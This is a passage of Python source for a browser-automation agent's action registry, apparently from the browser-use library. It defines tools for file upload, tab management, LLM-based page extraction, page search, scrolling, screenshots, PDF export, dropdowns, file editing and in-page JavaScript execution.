msg = f'File {params.path} is empty (0 bytes). The file may not have been saved correctly.'
return ActionResult(error=msg)
# Get the selector map to find the node
selector_map = await browser_session.get_selector_map()
if params.index not in selector_map:
msg = f'Element with index {params.index} does not exist.'
return ActionResult(error=msg)
node = selector_map[params.index]
# Helper function to find file input near the selected element
def find_file_input_near_element(
node: EnhancedDOMTreeNode, max_height: int = 3, max_descendant_depth: int = 3
) -> EnhancedDOMTreeNode | None:
def find_file_input_in_descendants(n: EnhancedDOMTreeNode, depth: int) -> EnhancedDOMTreeNode | None:
if depth < 0:
return None
if browser_session.is_file_input(n):
return n
for child in n.children_nodes or []:
result = find_file_input_in_descendants(child, depth - 1)
if result:
return result
return None
current = node
for _ in range(max_height + 1):
# Check the current node itself
if browser_session.is_file_input(current):
return current
# Check all descendants of the current node
result = find_file_input_in_descendants(current, max_descendant_depth)
if result:
return result
# Check all siblings and their descendants
if current.parent_node:
for sibling in current.parent_node.children_nodes or []:
if sibling is current:
continue
if browser_session.is_file_input(sibling):
return sibling
result = find_file_input_in_descendants(sibling, max_descendant_depth)
if result:
return result
current = current.parent_node
if not current:
break
return None
# Try to find a file input element near the selected element
file_input_node = find_file_input_near_element(node)
# Highlight the file input element if found (truly non-blocking)
if file_input_node:
create_task_with_error_handling(
browser_session.highlight_interaction_element(file_input_node),
name='highlight_file_input',
suppress_exceptions=True,
)
# If not found near the selected element, fallback to finding the closest file input to current scroll position
if file_input_node is None:
logger.info(
f'No file upload element found near index {params.index}, searching for closest file input to scroll position'
)
# Get current scroll position
cdp_session = await browser_session.get_or_create_cdp_session()
try:
scroll_info = await cdp_session.cdp_client.send.Runtime.evaluate(
params={'expression': 'window.scrollY || window.pageYOffset || 0'}, session_id=cdp_session.session_id
)
current_scroll_y = scroll_info.get('result', {}).get('value', 0)
except Exception:
current_scroll_y = 0
# Find all file inputs in the selector map and pick the closest one to scroll position
closest_file_input = None
min_distance = float('inf')
for idx, element in selector_map.items():
if browser_session.is_file_input(element):
# Get element's Y position
if element.absolute_position:
element_y = element.absolute_position.y
distance = abs(element_y - current_scroll_y)
if distance < min_distance:
min_distance = distance
closest_file_input = element
if closest_file_input:
file_input_node = closest_file_input
logger.info(f'Found file input closest to scroll position (distance: {min_distance}px)')
# Highlight the fallback file input element (truly non-blocking)
create_task_with_error_handling(
browser_session.highlight_interaction_element(file_input_node),
name='highlight_file_input_fallback',
suppress_exceptions=True,
)
else:
msg = 'No file upload element found on the page'
logger.error(msg)
raise BrowserError(msg)
# TODO: figure out why this fails sometimes + add fallback hail mary, just look for any file input on page
# Dispatch upload file event with the file input node
try:
event = browser_session.event_bus.dispatch(UploadFileEvent(node=file_input_node, file_path=params.path))
await event
await event.event_result(raise_if_any=True, raise_if_none=False)
msg = f'Successfully uploaded file to index {params.index}'
logger.info(f'📁 {msg}')
return ActionResult(
extracted_content=msg,
long_term_memory=f'Uploaded file {params.path} to element {params.index}',
)
except Exception as e:
logger.error(f'Failed to upload file: {e}')
raise BrowserError(f'Failed to upload file: {e}')
# Tab Management Actions
@self.registry.action(
'Switch to another open tab by tab_id. Tab IDs are shown in browser state tabs list (last 4 chars of target_id). Use when you need to work with content in a different tab.',
param_model=SwitchTabAction,
terminates_sequence=True,
)
async def switch(params: SwitchTabAction, browser_session: BrowserSession):
# Simple switch tab logic
try:
target_id = await browser_session.get_target_id_from_tab_id(params.tab_id)
event = browser_session.event_bus.dispatch(SwitchTabEvent(target_id=target_id))
await event
new_target_id = await event.event_result(raise_if_any=False, raise_if_none=False) # Don't raise on errors
if new_target_id:
memory = f'Switched to tab #{new_target_id[-4:]}'
else:
memory = f'Switched to tab #{params.tab_id}'
logger.info(f'🔄 {memory}')
return ActionResult(extracted_content=memory, long_term_memory=memory)
except Exception as e:
logger.warning(f'Tab switch may have failed: {e}')
memory = f'Attempted to switch to tab #{params.tab_id}'
return ActionResult(extracted_content=memory, long_term_memory=memory)
@self.registry.action(
'Close a tab by tab_id. Tab IDs are shown in browser state tabs list (last 4 chars of target_id). Use to clean up tabs you no longer need.',
param_model=CloseTabAction,
)
async def close(params: CloseTabAction, browser_session: BrowserSession):
# Simple close tab logic
try:
target_id = await browser_session.get_target_id_from_tab_id(params.tab_id)
# Dispatch close tab event - handle stale target IDs gracefully
event = browser_session.event_bus.dispatch(CloseTabEvent(target_id=target_id))
await event
await event.event_result(raise_if_any=False, raise_if_none=False) # Don't raise on errors
memory = f'Closed tab #{params.tab_id}'
logger.info(f'🗑️ {memory}')
return ActionResult(
extracted_content=memory,
long_term_memory=memory,
)
except Exception as e:
# Handle stale target IDs gracefully
logger.warning(f'Tab {params.tab_id} may already be closed: {e}')
memory = f'Tab #{params.tab_id} closed (was already closed or invalid)'
return ActionResult(
extracted_content=memory,
long_term_memory=memory,
)
@self.registry.action(
"""LLM extracts structured data from page markdown. Use when: on right page, know what to extract, haven't called before on same page+query. Can't get interactive elements. Set extract_links=True for URLs. Use start_from_char if previous extraction was truncated to extract data further down the page. When paginating across pages, pass already_collected with item identifiers (names/URLs) from prior pages to avoid duplicates.""",
param_model=ExtractAction,
)
async def extract(
params: ExtractAction,
browser_session: BrowserSession,
page_extraction_llm: BaseChatModel,
file_system: FileSystem,
extraction_schema: dict | None = None,
):
# Constants
MAX_CHAR_LIMIT = 100000
query = params['query'] if isinstance(params, dict) else params.query
extract_links = params['extract_links'] if isinstance(params, dict) else params.extract_links
start_from_char = params['start_from_char'] if isinstance(params, dict) else params.start_from_char
output_schema: dict | None = params.get('output_schema') if isinstance(params, dict) else params.output_schema
already_collected: list[str] = (
params.get('already_collected', []) if isinstance(params, dict) else params.already_collected
)
# If the LLM didn't provide an output_schema, use the agent-injected extraction_schema
if output_schema is None and extraction_schema is not None:
output_schema = extraction_schema
# Attempt to convert output_schema to a pydantic model upfront; fall back to free-text on failure
structured_model: type[BaseModel] | None = None
if output_schema is not None:
try:
from browser_use.tools.extraction.schema_utils import schema_dict_to_pydantic_model
structured_model = schema_dict_to_pydantic_model(output_schema)
except (ValueError, TypeError) as exc:
logger.warning(f'Invalid output_schema, falling back to free-text extraction: {exc}')
output_schema = None
# Extract clean markdown using the unified method
try:
from browser_use.dom.markdown_extractor import extract_clean_markdown
content, content_stats = await extract_clean_markdown(
browser_session=browser_session, extract_links=extract_links
)
except Exception as e:
raise RuntimeError(f'Could not extract clean markdown: {type(e).__name__}')
# Original content length for processing
final_filtered_length = content_stats['final_filtered_chars']
# Structure-aware chunking replaces naive char-based truncation
from browser_use.dom.markdown_extractor import chunk_markdown_by_structure
chunks = chunk_markdown_by_structure(content, max_chunk_chars=MAX_CHAR_LIMIT, start_from_char=start_from_char)
if not chunks:
return ActionResult(
error=f'start_from_char ({start_from_char}) exceeds content length {final_filtered_length} characters.'
)
chunk = chunks[0]
content = chunk.content
truncated = chunk.has_more
# Prepend overlap context for continuation chunks (e.g. table headers)
if chunk.overlap_prefix:
content = chunk.overlap_prefix + '\n' + content
if start_from_char > 0:
content_stats['started_from_char'] = start_from_char
if truncated:
content_stats['truncated_at_char'] = chunk.char_offset_end
content_stats['next_start_char'] = chunk.char_offset_end
content_stats['chunk_index'] = chunk.chunk_index
content_stats['total_chunks'] = chunk.total_chunks
# Add content statistics to the result
original_html_length = content_stats['original_html_chars']
initial_markdown_length = content_stats['initial_markdown_chars']
chars_filtered = content_stats['filtered_chars_removed']
stats_summary = f"""Content processed: {original_html_length:,} HTML chars → {initial_markdown_length:,} initial markdown → {final_filtered_length:,} filtered markdown"""
if start_from_char > 0:
stats_summary += f' (started from char {start_from_char:,})'
if truncated:
chunk_info = f'chunk {chunk.chunk_index + 1} of {chunk.total_chunks}, '
stats_summary += f' → {len(content):,} final chars ({chunk_info}use start_from_char={content_stats["next_start_char"]} to continue)'
elif chars_filtered > 0:
stats_summary += f' (filtered {chars_filtered:,} chars of noise)'
# Sanitize surrogates from content to prevent UTF-8 encoding errors
content = sanitize_surrogates(content)
query = sanitize_surrogates(query)
# --- Structured extraction path ---
if structured_model is not None:
assert output_schema is not None
system_prompt = """
You are an expert at extracting structured data from the markdown of a webpage.
<input>
You will be given a query, a JSON Schema, and the markdown of a webpage that has been filtered to remove noise and advertising content.
</input>
<instructions>
- Extract ONLY information present in the webpage. Do not guess or fabricate values.
- Your response MUST conform to the provided JSON Schema exactly.
- If a required field's value cannot be found on the page, use null (if the schema allows it) or an empty string / empty array as appropriate.
- If the content was truncated, extract what is available from the visible portion.
- If <already_collected> items are provided, skip any items whose name/title/URL matches those listed — do not include duplicates.
</instructions>
""".strip()
schema_json = json.dumps(output_schema, indent=2)
already_collected_section = ''
if already_collected:
items_str = '\n'.join(f'- {item}' for item in already_collected[:100])
already_collected_section = f'\n\n<already_collected>\nSkip items whose name/title/URL matches any of these already-collected identifiers:\n{items_str}\n</already_collected>'
prompt = (
f'<query>\n{query}\n</query>\n\n'
f'<output_schema>\n{schema_json}\n</output_schema>\n\n'
f'<content_stats>\n{stats_summary}\n</content_stats>\n\n'
f'<webpage_content>\n{content}\n</webpage_content>' + already_collected_section
)
try:
response = await asyncio.wait_for(
page_extraction_llm.ainvoke(
[SystemMessage(content=system_prompt), UserMessage(content=prompt)],
output_format=structured_model,
),
timeout=120.0,
)
# response.completion is a pydantic model instance
result_data: dict = response.completion.model_dump(mode='json') # type: ignore[union-attr]
result_json = json.dumps(result_data)
current_url = await browser_session.get_current_page_url()
extracted_content = f'<url>\n{current_url}\n</url>\n<query>\n{query}\n</query>\n<structured_result>\n{result_json}\n</structured_result>'
from browser_use.tools.extraction.views import ExtractionResult
extraction_meta = ExtractionResult(
data=result_data,
schema_used=output_schema,
is_partial=truncated,
source_url=current_url,
content_stats=content_stats,
)
# Simple memory handling
MAX_MEMORY_LENGTH = 10000
if len(extracted_content) < MAX_MEMORY_LENGTH:
memory = extracted_content
include_extracted_content_only_once = False
else:
file_name = await file_system.save_extracted_content(extracted_content)
memory = f'Query: {query}\nContent in {file_name} and once in <read_state>.'
include_extracted_content_only_once = True
logger.info(f'📄 {memory}')
return ActionResult(
extracted_content=extracted_content,
include_extracted_content_only_once=include_extracted_content_only_once,
long_term_memory=memory,
metadata={'structured_extraction': True, 'extraction_result': extraction_meta.model_dump(mode='json')},
)
except Exception as e:
logger.debug(f'Error in structured extraction: {e}')
raise RuntimeError(str(e))
# --- Free-text extraction path (default) ---
system_prompt = """
You are an expert at extracting data from the markdown of a webpage.
<input>
You will be given a query and the markdown of a webpage that has been filtered to remove noise and advertising content.
</input>
<instructions>
- You are tasked to extract information from the webpage that is relevant to the query.
- You should ONLY use the information available in the webpage to answer the query. Do not make up information or provide guess from your own knowledge.
- If the information relevant to the query is not available in the page, your response should mention that.
- If the query asks for all items, products, etc., make sure to directly list all of them.
- If the content was truncated and you need more information, note that the user can use start_from_char parameter to continue from where truncation occurred.
- If <already_collected> items are provided, exclude any results whose name/title/URL matches those already collected — do not include duplicates.
</instructions>
<output>
- Your output should present ALL the information relevant to the query in a concise way.
- Do not answer in conversational format - directly output the relevant information or that the information is unavailable.
</output>
""".strip()
already_collected_section = ''
if already_collected:
items_str = '\n'.join(f'- {item}' for item in already_collected[:100])
already_collected_section = f'\n\n<already_collected>\nSkip items whose name/title/URL matches any of these already-collected identifiers:\n{items_str}\n</already_collected>'
prompt = (
f'<query>\n{query}\n</query>\n\n<content_stats>\n{stats_summary}\n</content_stats>\n\n<webpage_content>\n{content}\n</webpage_content>'
+ already_collected_section
)
try:
response = await asyncio.wait_for(
page_extraction_llm.ainvoke([SystemMessage(content=system_prompt), UserMessage(content=prompt)]),
timeout=120.0,
)
current_url = await browser_session.get_current_page_url()
extracted_content = (
f'<url>\n{current_url}\n</url>\n<query>\n{query}\n</query>\n<result>\n{response.completion}\n</result>'
)
# Simple memory handling
MAX_MEMORY_LENGTH = 10000
if len(extracted_content) < MAX_MEMORY_LENGTH:
memory = extracted_content
include_extracted_content_only_once = False
else:
file_name = await file_system.save_extracted_content(extracted_content)
memory = f'Query: {query}\nContent in {file_name} and once in <read_state>.'
include_extracted_content_only_once = True
logger.info(f'📄 {memory}')
return ActionResult(
extracted_content=extracted_content,
include_extracted_content_only_once=include_extracted_content_only_once,
long_term_memory=memory,
)
except Exception as e:
logger.debug(f'Error extracting content: {e}')
raise RuntimeError(str(e))
# --- Page search and exploration tools (zero LLM cost) ---
@self.registry.action(
"""Search page text for a pattern (like grep). Zero LLM cost, instant. Returns matches with surrounding context. Use to find specific text, verify content exists, or locate data on the page. Set regex=True for regex patterns. Use css_scope to search within a specific section.""",
param_model=SearchPageAction,
)
async def search_page(params: SearchPageAction, browser_session: BrowserSession):
js_code = _build_search_page_js(
pattern=params.pattern,
regex=params.regex,
case_sensitive=params.case_sensitive,
context_chars=params.context_chars,
css_scope=params.css_scope,
max_results=params.max_results,
)
cdp_session = await browser_session.get_or_create_cdp_session()
result = await cdp_session.cdp_client.send.Runtime.evaluate(
params={'expression': js_code, 'returnByValue': True, 'awaitPromise': True},
session_id=cdp_session.session_id,
)
if result.get('exceptionDetails'):
error_text = result['exceptionDetails'].get('text', 'Unknown JS error')
return ActionResult(error=f'search_page failed: {error_text}')
data = result.get('result', {}).get('value')
if data is None:
return ActionResult(error='search_page returned no result')
if isinstance(data, dict) and data.get('error'):
return ActionResult(error=f'search_page: {data["error"]}')
formatted = _format_search_results(data, params.pattern)
total = data.get('total', 0)
memory = f'Searched page for "{params.pattern}": {total} match{"es" if total != 1 else ""} found.'
logger.info(f'🔎 {memory}')
return ActionResult(extracted_content=formatted, long_term_memory=memory)
@self.registry.action(
"""Query DOM elements by CSS selector (like find). Zero LLM cost, instant. Returns matching elements with tag, text, and attributes. Use to explore page structure, count items, get links/attributes. Use attributes=["href","src"] to extract specific attributes.""",
param_model=FindElementsAction,
)
async def find_elements(params: FindElementsAction, browser_session: BrowserSession):
js_code = _build_find_elements_js(
selector=params.selector,
attributes=params.attributes,
max_results=params.max_results,
include_text=params.include_text,
)
cdp_session = await browser_session.get_or_create_cdp_session()
result = await cdp_session.cdp_client.send.Runtime.evaluate(
params={'expression': js_code, 'returnByValue': True, 'awaitPromise': True},
session_id=cdp_session.session_id,
)
if result.get('exceptionDetails'):
error_text = result['exceptionDetails'].get('text', 'Unknown JS error')
return ActionResult(error=f'find_elements failed: {error_text}')
data = result.get('result', {}).get('value')
if data is None:
return ActionResult(error='find_elements returned no result')
if isinstance(data, dict) and data.get('error'):
return ActionResult(error=f'find_elements: {data["error"]}')
formatted = _format_find_results(data, params.selector)
total = data.get('total', 0)
memory = f'Found {total} element{"s" if total != 1 else ""} matching "{params.selector}".'
logger.info(f'🔍 {memory}')
return ActionResult(extracted_content=formatted, long_term_memory=memory)
@self.registry.action(
"""Scroll by pages. REQUIRED: down=True/False (True=scroll down, False=scroll up, default=True). Optional: pages=0.5-10.0 (default 1.0). Use index for scroll elements (dropdowns/custom UI). High pages (10) reaches bottom. Multi-page scrolls sequentially. Viewport-based height, fallback 1000px/page.""",
param_model=ScrollAction,
)
async def scroll(params: ScrollAction, browser_session: BrowserSession):
try:
# Look up the node from the selector map if index is provided
# Special case: index 0 means scroll the whole page (root/body element)
node = None
if params.index is not None and params.index != 0:
node = await browser_session.get_element_by_index(params.index)
if node is None:
# Element does not exist
msg = f'Element index {params.index} not found in browser state'
return ActionResult(error=msg)
direction = 'down' if params.down else 'up'
target = f'element {params.index}' if params.index is not None and params.index != 0 else ''
# Get actual viewport height for more accurate scrolling
try:
cdp_session = await browser_session.get_or_create_cdp_session()
metrics = await cdp_session.cdp_client.send.Page.getLayoutMetrics(session_id=cdp_session.session_id)
# Use cssVisualViewport for the most accurate representation
css_viewport = metrics.get('cssVisualViewport', {})
css_layout_viewport = metrics.get('cssLayoutViewport', {})
# Get viewport height, prioritizing cssVisualViewport
viewport_height = int(css_viewport.get('clientHeight') or css_layout_viewport.get('clientHeight', 1000))
logger.debug(f'Detected viewport height: {viewport_height}px')
except Exception as e:
viewport_height = 1000 # Fallback to 1000px
logger.debug(f'Failed to get viewport height, using fallback 1000px: {e}')
# For multiple pages (>=1.0), scroll one page at a time to ensure each scroll completes
if params.pages >= 1.0:
import asyncio
num_full_pages = int(params.pages)
remaining_fraction = params.pages - num_full_pages
completed_scrolls = 0
# Scroll one page at a time
for i in range(num_full_pages):
try:
pixels = viewport_height # Use actual viewport height
if not params.down:
pixels = -pixels
event = browser_session.event_bus.dispatch(
ScrollEvent(direction=direction, amount=abs(pixels), node=node)
)
await event
await event.event_result(raise_if_any=True, raise_if_none=False)
completed_scrolls += 1
# Small delay to ensure scroll completes before next one
await asyncio.sleep(0.15)
except Exception as e:
logger.warning(f'Scroll {i + 1}/{num_full_pages} failed: {e}')
# Continue with remaining scrolls even if one fails
# Handle fractional page if present
if remaining_fraction > 0:
try:
pixels = int(remaining_fraction * viewport_height)
if not params.down:
pixels = -pixels
event = browser_session.event_bus.dispatch(
ScrollEvent(direction=direction, amount=abs(pixels), node=node)
)
await event
await event.event_result(raise_if_any=True, raise_if_none=False)
completed_scrolls += remaining_fraction
except Exception as e:
logger.warning(f'Fractional scroll failed: {e}')
if params.pages == 1.0:
long_term_memory = f'Scrolled {direction} {target} {viewport_height}px'.replace(' ', ' ')
else:
long_term_memory = f'Scrolled {direction} {target} {completed_scrolls:.1f} pages'.replace(' ', ' ')
else:
# For fractional pages <1.0, do single scroll
pixels = int(params.pages * viewport_height)
event = browser_session.event_bus.dispatch(
ScrollEvent(direction='down' if params.down else 'up', amount=pixels, node=node)
)
await event
await event.event_result(raise_if_any=True, raise_if_none=False)
long_term_memory = f'Scrolled {direction} {target} {params.pages} pages'.replace(' ', ' ')
msg = f'🔍 {long_term_memory}'
logger.info(msg)
return ActionResult(extracted_content=msg, long_term_memory=long_term_memory)
except Exception as e:
logger.error(f'Failed to dispatch ScrollEvent: {type(e).__name__}: {e}')
error_msg = 'Failed to execute scroll action.'
return ActionResult(error=error_msg)
@self.registry.action(
'',
param_model=SendKeysAction,
)
async def send_keys(params: SendKeysAction, browser_session: BrowserSession):
# Dispatch send keys event
try:
event = browser_session.event_bus.dispatch(SendKeysEvent(keys=params.keys))
await event
await event.event_result(raise_if_any=True, raise_if_none=False)
memory = f'Sent keys: {params.keys}'
msg = f'⌨️ {memory}'
logger.info(msg)
return ActionResult(extracted_content=memory, long_term_memory=memory)
except Exception as e:
logger.error(f'Failed to dispatch SendKeysEvent: {type(e).__name__}: {e}')
error_msg = f'Failed to send keys: {str(e)}'
return ActionResult(error=error_msg)
@self.registry.action('Scroll to text.')
async def find_text(text: str, browser_session: BrowserSession): # type: ignore
# Dispatch scroll to text event
event = browser_session.event_bus.dispatch(ScrollToTextEvent(text=text))
try:
# The handler returns None on success or raises an exception if text not found
await event.event_result(raise_if_any=True, raise_if_none=False)
memory = f'Scrolled to text: {text}'
msg = f'🔍 {memory}'
logger.info(msg)
return ActionResult(extracted_content=memory, long_term_memory=memory)
except Exception as e:
# Text not found
msg = f"Text '{text}' not found or not visible on page"
logger.info(msg)
return ActionResult(
extracted_content=msg,
long_term_memory=f"Tried scrolling to text '{text}' but it was not found",
)
@self.registry.action(
'Take a screenshot of the current viewport. If file_name is provided, saves to that file and returns the path. '
'Otherwise, screenshot is included in the next browser_state observation.',
param_model=ScreenshotAction,
)
async def screenshot(
params: ScreenshotAction,
browser_session: BrowserSession,
file_system: FileSystem,
):
if params.file_name:
# Save screenshot to file
file_name = params.file_name
if not file_name.lower().endswith('.png'):
file_name = f'{file_name}.png'
file_name = FileSystem.sanitize_filename(file_name)
screenshot_bytes = await browser_session.take_screenshot(full_page=False)
file_path = file_system.get_dir() / file_name
file_path.write_bytes(screenshot_bytes)
result = f'Screenshot saved to {file_name}'
logger.info(f'📸 {result}. Full path: {file_path}')
return ActionResult(
extracted_content=result,
long_term_memory=f'{result}. Full path: {file_path}',
attachments=[str(file_path)],
)
else:
# Flag for next observation
memory = 'Requested screenshot for next observation'
logger.info(f'📸 {memory}')
return ActionResult(
extracted_content=memory,
metadata={'include_screenshot': True},
)
# PDF Actions
@self.registry.action(
'Save the current page as a PDF file. Returns the file path of the saved PDF. '
'Use this to capture the full page content (including content below the fold) as a printable document.',
param_model=SaveAsPdfAction,
)
async def save_as_pdf(
params: SaveAsPdfAction,
browser_session: BrowserSession,
file_system: FileSystem,
):
import base64
import re
# Paper format dimensions in inches (width, height)
paper_sizes: dict[str, tuple[float, float]] = {
'letter': (8.5, 11),
'legal': (8.5, 14),
'a4': (8.27, 11.69),
'a3': (11.69, 16.54),
'tabloid': (11, 17),
}
paper_key = params.paper_format.lower()
if paper_key not in paper_sizes:
paper_key = 'letter'
paper_width, paper_height = paper_sizes[paper_key]
cdp_session = await browser_session.get_or_create_cdp_session(focus=True)
result = await asyncio.wait_for(
cdp_session.cdp_client.send.Page.printToPDF(
params={
'printBackground': params.print_background,
'landscape': params.landscape,
'scale': params.scale,
'paperWidth': paper_width,
'paperHeight': paper_height,
'preferCSSPageSize': True,
},
session_id=cdp_session.session_id,
),
timeout=30.0,
)
pdf_data = result.get('data')
assert pdf_data, 'CDP Page.printToPDF returned no data'
pdf_bytes = base64.b64decode(pdf_data)
# Determine filename
if params.file_name:
file_name = params.file_name
else:
try:
page_title = await asyncio.wait_for(browser_session.get_current_page_title(), timeout=2.0)
safe_title = re.sub(r'[^\w\s-]', '', page_title).strip()[:50]
file_name = safe_title if safe_title else 'page'
except Exception:
file_name = 'page'
if not file_name.lower().endswith('.pdf'):
file_name = f'{file_name}.pdf'
file_name = FileSystem.sanitize_filename(file_name)
file_path = file_system.get_dir() / file_name
# Handle duplicate filenames
if file_path.exists():
base, ext = os.path.splitext(file_name)
counter = 1
while (file_system.get_dir() / f'{base} ({counter}){ext}').exists():
counter += 1
file_name = f'{base} ({counter}){ext}'
file_path = file_system.get_dir() / file_name
async with await anyio.open_file(file_path, 'wb') as f:
await f.write(pdf_bytes)
file_size = file_path.stat().st_size
msg = f'Saved page as PDF: {file_name} ({file_size:,} bytes)'
logger.info(f'📄 {msg}. Full path: {file_path}')
return ActionResult(
extracted_content=msg,
long_term_memory=f'{msg}. Full path: {file_path}',
attachments=[str(file_path)],
)
# Dropdown Actions
@self.registry.action(
'',
param_model=GetDropdownOptionsAction,
)
async def dropdown_options(params: GetDropdownOptionsAction, browser_session: BrowserSession):
# Look up the node from the selector map
node = await browser_session.get_element_by_index(params.index)
if node is None:
msg = f'Element index {params.index} not available - page may have changed. Try refreshing browser state.'
logger.warning(f'⚠️ {msg}')
return ActionResult(extracted_content=msg)
# Dispatch GetDropdownOptionsEvent to the event handler
event = browser_session.event_bus.dispatch(GetDropdownOptionsEvent(node=node))
dropdown_data = await event.event_result(timeout=3.0, raise_if_none=True, raise_if_any=True)
if not dropdown_data:
raise ValueError('Failed to get dropdown options - no data returned')
# Use structured memory from the handler
return ActionResult(
extracted_content=dropdown_data['short_term_memory'],
long_term_memory=dropdown_data['long_term_memory'],
include_extracted_content_only_once=True,
)
@self.registry.action(
'Set the option of a <select> element.',
param_model=SelectDropdownOptionAction,
)
async def select_dropdown(params: SelectDropdownOptionAction, browser_session: BrowserSession):
# Look up the node from the selector map
node = await browser_session.get_element_by_index(params.index)
if node is None:
msg = f'Element index {params.index} not available - page may have changed. Try refreshing browser state.'
logger.warning(f'⚠️ {msg}')
return ActionResult(extracted_content=msg)
# Dispatch SelectDropdownOptionEvent to the event handler
from browser_use.browser.events import SelectDropdownOptionEvent
event = browser_session.event_bus.dispatch(SelectDropdownOptionEvent(node=node, text=params.text))
selection_data = await event.event_result()
if not selection_data:
raise ValueError('Failed to select dropdown option - no data returned')
# Check if the selection was successful
if selection_data.get('success') == 'true':
# Extract the message from the returned data
msg = selection_data.get('message', f'Selected option: {params.text}')
return ActionResult(
extracted_content=msg,
include_in_memory=True,
long_term_memory=f"Selected dropdown option '{params.text}' at index {params.index}",
)
else:
# Handle structured error response
# TODO: raise BrowserError instead of returning ActionResult
if 'short_term_memory' in selection_data and 'long_term_memory' in selection_data:
return ActionResult(
extracted_content=selection_data['short_term_memory'],
long_term_memory=selection_data['long_term_memory'],
include_extracted_content_only_once=True,
)
else:
# Fallback to regular error
error_msg = selection_data.get('error', f'Failed to select option: {params.text}')
return ActionResult(error=error_msg)
# File System Actions
@self.registry.action(
'Write content to a file. By default this OVERWRITES the entire file - use append=true to add to an existing file, or use replace_file for targeted edits within a file. '
'FILENAME RULES: Use only letters, numbers, underscores, hyphens, dots, parentheses. Spaces are auto-converted to hyphens. '
'SUPPORTED EXTENSIONS: .txt, .md, .json, .jsonl, .csv, .html, .xml, .pdf, .docx. '
'CANNOT write binary/image files (.png, .jpg, .mp4, etc.) - do not attempt to save screenshots as files. '
'For PDF files, write content in markdown format and it will be auto-converted to PDF.'
)
async def write_file(
file_name: str,
content: str,
file_system: FileSystem,
append: bool = False,
trailing_newline: bool = True,
leading_newline: bool = False,
):
if trailing_newline:
content += '\n'
if leading_newline:
content = '\n' + content
if append:
result = await file_system.append_file(file_name, content)
else:
result = await file_system.write_file(file_name, content)
# Log the full path where the file is stored (use resolved name)
resolved_name, _ = file_system._resolve_filename(file_name)
file_path = file_system.get_dir() / resolved_name
logger.info(f'💾 {result} File location: {file_path}')
return ActionResult(extracted_content=result, long_term_memory=result)
@self.registry.action(
'Replace specific text within a file by searching for old_str and replacing with new_str. Use this for targeted edits like updating todo checkboxes or modifying specific lines without rewriting the entire file.'
)
async def replace_file(file_name: str, old_str: str, new_str: str, file_system: FileSystem):
result = await file_system.replace_file_str(file_name, old_str, new_str)
logger.info(f'💾 {result}')
return ActionResult(extracted_content=result, long_term_memory=result)
@self.registry.action(
'Read the complete content of a file. Use this to view file contents before editing or to retrieve data from files. Supports text files (txt, md, json, csv, jsonl), documents (pdf, docx), and images (jpg, png).'
)
async def read_file(file_name: str, available_file_paths: list[str], file_system: FileSystem):
if available_file_paths and file_name in available_file_paths:
structured_result = await file_system.read_file_structured(file_name, external_file=True)
else:
structured_result = await file_system.read_file_structured(file_name)
result = structured_result['message']
images = structured_result.get('images')
MAX_MEMORY_SIZE = 1000
# For images, create a shorter memory message
if images:
memory = f'Read image file {file_name}'
elif len(result) > MAX_MEMORY_SIZE:
lines = result.splitlines()
display = ''
lines_count = 0
for line in lines:
if len(display) + len(line) < MAX_MEMORY_SIZE:
display += line + '\n'
lines_count += 1
else:
break
remaining_lines = len(lines) - lines_count
memory = f'{display}{remaining_lines} more lines...' if remaining_lines > 0 else display
else:
memory = result
logger.info(f'💾 {memory}')
return ActionResult(
extracted_content=result,
long_term_memory=memory,
images=images,
include_extracted_content_only_once=True,
)
@self.registry.action(
"""Execute browser JavaScript. Best practice: wrap in IIFE (function(){...})() with try-catch for safety. Use ONLY browser APIs (document, window, DOM). NO Node.js APIs (fs, require, process). Example: (function(){try{const el=document.querySelector('#id');return el?el.value:'not found'}catch(e){return 'Error: '+e.message}})() Avoid comments. Use for hover, drag, zoom, custom selectors, extract/filter links, or analysing page structure. IMPORTANT: Shadow DOM elements with [index] markers can be clicked directly with click(index) — do NOT use evaluate() to click them. Only use evaluate for shadow DOM elements that are NOT indexed. Limit output size.""",
terminates_sequence=True,
)
async def evaluate(code: str, browser_session: BrowserSession):
# Execute JavaScript with proper error handling and promise support
cdp_session = await browser_session.get_or_create_cdp_session()
try:
# Validate and potentially fix JavaScript code before execution
validated_code = self._validate_and_fix_javascript(code)
# Always use awaitPromise=True - it's ignored for non-promises
result = await cdp_session.cdp_client.send.Runtime.evaluate(
params={'expression': validated_code, 'returnByValue': True, 'awaitPromise': True},
session_id=cdp_session.session_id,
)
# Check for JavaScript execution errors
if result.get('exceptionDetails'):
exception = result['exceptionDetails']
error_msg = f'JavaScript execution error: {exception.get("text", "Unknown error")}'
# Enhanced error message with debugging info
enhanced_msg = f"""JavaScript Execution Failed:
{error_msg}
Validated Code (after quote fixing):
{validated_code[:500]}{'...' if len(validated_code) > 500 else ''}
"""
logger.debug(enhanced_msg)
return ActionResult(error=enhanced_msg)
# Get the result data
result_data = result.get('result', {})
# Check for wasThrown flag (backup error detection)
if result_data.get('wasThrown'):
msg = f'JavaScript code: {code} execution failed (wasThrown=true)'
logger.debug(msg)
return ActionResult(error=msg)
# Get the actual value
value = result_data.get('value')
# Handle different value types
if value is None:
# Could be legitimate null/undefined result
result_text = str(value) if 'value' in result_data else 'undefined'
elif isinstance(value, (dict, list)):
# Complex objects - should be serialized by returnByValue
try:
result_text = json.dumps(value, ensure_ascii=False)
except (TypeError, ValueError):
# Fallback for non-serializable objects
result_text = str(value)
else:
# Primitive values (string, number, boolean)
result_text = str(value)
import re
image_pattern = r'(data:image/[^;]+;base64,[A-Za-z0-9+/=]+)'
found_images = re.findall(image_pattern, result_text)
metadata = None
if found_images:
# Store images in metadata so they can be added as ContentPartImageParam
metadata = {'images': found_images}
# Replace image data in result text with shorter placeholder
modified_text = result_text
for i, img_data in enumerate(found_images, 1):
placeholder = '[Image]'
modified_text = modified_text.replace(img_data, placeholder)
result_text = modified_text
# Apply length limit with better truncation (after image extraction)
if len(result_text) > 20000:
result_text = result_text[:19950] + '\n... [Truncated after 20000 characters]'
# Don't log the code - it's already visible in the user's cell
logger.debug(f'JavaScript executed successfully, result length: {len(result_text)}')
# Memory handling: keep full result in extracted_content for current step,
# but use truncated version in long_term_memory if too large
MAX_MEMORY_LENGTH = 10000
if len(result_text) < MAX_MEMORY_LENGTH:
memory = result_text
include_extracted_content_only_once = False
else:
memory = f'JavaScript executed successfully, result length: {len(result_text)} characters.'
include_extracted_content_only_once = True
# Return only the result, not the code (code is already in user's cell)
return ActionResult(
extracted_content=result_text,
long_term_memory=memory,
include_extracted_content_only_once=include_extracted_content_only_once,
metadata=metadata,
)
except Exception as e:
# CDP communication or other system errors
